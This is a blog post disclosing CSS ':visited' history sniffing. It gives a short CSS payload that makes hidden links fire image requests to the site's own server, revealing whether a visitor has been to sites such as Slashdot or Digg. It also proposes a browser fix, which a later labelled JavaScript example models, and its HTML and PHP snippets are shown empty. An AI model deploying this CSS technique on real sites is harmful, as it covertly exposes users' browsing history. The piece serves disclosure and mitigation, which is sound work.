Remotely Viewing A User’s Web History With CSS

Throughout the years, there have been several JavaScript/CSS/VBScript exploits in various browsers (and by “various”, I mean mostly Internet Explorer) that allow a remote site to view a user’s complete web history.

There is a technique, however, for easily recording a user’s browsing history without relying on a remote code execution exploit, and the only requirement is a fairly W3C CSS-compliant browser. That’s right – even JavaScript-disabled visitors can still have their browsing histories compromised with this technique.

The Disclaimer

This code is provided as an example of a flaw which spans several web browsers, but is not meant to be implemented on an actual functional web site outside of the purpose of demonstration (as we provide below). Production usage of this code is considered a violation of privacy from both the standpoint of the end-user(s) and law enforcement in some regions.

In a nutshell: This is an example of a flaw, don’t actually use this.

The Standard

W3C CSS standards state that if a hyperlink has been visited and there is an ‘a:visited’ pseudo-class CSS definition that matches said link, then the link is to be formatted according to the CSS statements within that ‘a:visited’ definition.

So, by adding something like the following (demonstration-only; see above) code, you can detect what sites or pages a user has been to, provided you know what you are looking for:


/* Hidden so the user doesn't see them */
a {visibility:hidden;} /* alternatively, background-image:url('/not.png'); etc. */
a.slashdot:visited{background-image:url('/v.png?site=slashdot');visibility:hidden;}
a.digg:visited{background-image:url('/v.png?site=digg');visibility:hidden;}

And the HTML:

.
.

The above code uses the CSS standard as an exploit to determine whether the user has visited Slashdot.org or Digg.com. The same code can be applied to any site you wish to detect, and so far works in all pseudo-class supporting browsers.

This excludes Internet Explorer 6, but there are other ActiveX exploits you can use for that instead :D

However, the technique also requires some crafty PHP code for recording the information on the server when the browser requests the ‘v.png’ file.

The Hack

The ‘v.png’ file used above is the receiver of the visit detection. It is actually named ‘v.png.php’ on an Apache/IIS server that supports leaving off the file extension of a script name (the ‘+MultiViews’ option in Apache).

The code for ‘v.png.php’ would ideally look something like this:



There is an example of this page found here, only it doesn’t actually record any of the example links you’ve followed. PHP source code is found at the .txt symbolic link here for v.png.php.

The Fix

Browser authors can patch this up by disallowing cross-site CSS link checking. For example, if ebay.com is checking for visited links to ebay.com, then fine. But if ebay.com is checking for links to google.com, then the browser should not apply the ‘:visited’ rule that violates the security measure.

Sub-domains should count as the same site, since some sites spread content across many hosts (e.g. s1.ibm.com) for massive server farms or other reasons.

All of these restrictions should be user-overridable, in the same fashion as about:config in Mozilla Firefox, since some developers may need to debug this behaviour after accidentally triggering it on their own site.
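As an added example that is not part of the original post, here is a model of the policy just described: a page may apply ‘:visited’ styling only to links within its own registrable domain, sub-domains included. It assumes the registrable domain is the last two host labels; a real browser would consult the Public Suffix List instead.

```javascript
// Added example (not from the original post): a model of the proposed fix.
// A page may style :visited links only when the link's host belongs to the
// page's own registrable domain (sub-domains such as s1.ibm.com included).
//
// Assumption: the registrable domain is approximated by the last two host
// labels. A real implementation would use the Public Suffix List so that
// hosts like "example.co.uk" are handled correctly.

function registrableDomain(hostname) {
  const labels = hostname.toLowerCase().replace(/\.$/, '').split('.');
  if (labels.length < 2) return labels.join('.'); // e.g. "localhost"
  return labels.slice(-2).join('.');
}

// Returns true when a :visited rule from the page at pageUrl may be applied
// to a link pointing at linkHref, false when the rule must be ignored.
function mayStyleVisited(pageUrl, linkHref) {
  const page = new URL(pageUrl);
  // Resolve relative links against the page, as the browser would.
  const link = new URL(linkHref, pageUrl);
  // Only http(s) links carry cross-site history; block everything else.
  if (link.protocol !== 'http:' && link.protocol !== 'https:') return false;
  return registrableDomain(page.hostname) === registrableDomain(link.hostname);
}

// Apply the policy to a batch of link targets, such as the ones a stylesheet
// like the post's would probe: keep the ones that may be styled, drop the rest.
function filterVisitedTargets(pageUrl, hrefs) {
  return hrefs.filter((href) => mayStyleVisited(pageUrl, href));
}
```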

The Verdict

Will it allow shellcode to enter your computer and fire up a VNC server for remote control? No.

Will it violate your privacy on a per-site basis? Absolutely.

So while not a “code-red” exploit, it is still serious enough to be considered a major bug, both in the CSS standard’s oversight and in the way most browsers blindly implement the standard. Nothing in the W3C specifications forbids the mitigations outlined here, and they would benefit users greatly.

An ad within an iframe HTML element could easily use this to target advertisements based on the user’s previous browsing history, especially if using the hidden CSS attribute and outputting the ad on the fly per-request.

Whatever the scenario, this needs to be fixed and promptly. While not a major exploit, it is one serious enough to be considered a major invasion of privacy for users.

(Thanks to editor-in-chief Anthony for both pointing this out to me initially and providing the example code. I’m a researcher, not a security expert A.K.A hacker)

Stephen

Stephen (last name kept private) is currently a student at the University of South Carolina with a major in computer science. He is very knowledgeable when it comes to current as well as up-and-coming software technologies, and is renowned for his intuitive reviews of software products and services.
